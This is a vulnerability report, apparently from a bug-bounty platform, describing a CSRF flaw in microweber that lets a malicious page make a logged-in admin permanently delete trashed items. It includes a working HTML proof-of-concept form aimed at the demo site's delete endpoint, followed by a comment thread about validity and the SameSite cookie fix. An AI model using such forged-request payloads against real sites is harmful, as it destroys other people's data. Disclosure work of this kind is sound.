Cross-Site Request Forgery (CSRF) in microweber/microweber
Reported on
Aug 9th 2021
✍️ Description
Attacker able to delete all file forever from trash if knows the id parameter value of all files that exist in trash with CSRF attack.
🕵️♂️ Proof of Concept
Here after running PoC.html on Firefox or Safari and click on submit button (also can be auto-submit) you will see that the file with 18 and 19 and 20 ids have been deleted.
//PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
<input type="hidden" name="ids[]" value="18" />
<input type="hidden" name="ids[]" value="19" />
<input type="hidden" name="ids[]" value="20" />
<input type="hidden" name="forever" value="true" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
All files on trash will be deleted forever. 📍 Location app.js#L1
Occurrences
This issue need the user to be logged as admin
Yah the main action of any CSRF attack is that users must be logged in before, excuse me for my bad explanation but this is CSRF and already assigned a CWE to it.
CSRF attacks means at the first user/admin should be logged into your application and then just going to a malicious website and after that only with visiting a site attacker can delete a batch of users.
You can set Strict value on SameSite attribute of just one of your cookies and then anybody won't able to perform any CSRF attacks.
@admin can you change the status of this report like before?
@amammad - I have updated the status of the report.
@maintainer - feel free to mark as valid if you see fit.
Yah, your welcome dear peter. can you validate the other CSRFs too?
@admin Hey man, I make a foolish mistake and report a vulnerabity with wrong title.
can you change the title to CSRF? with regards .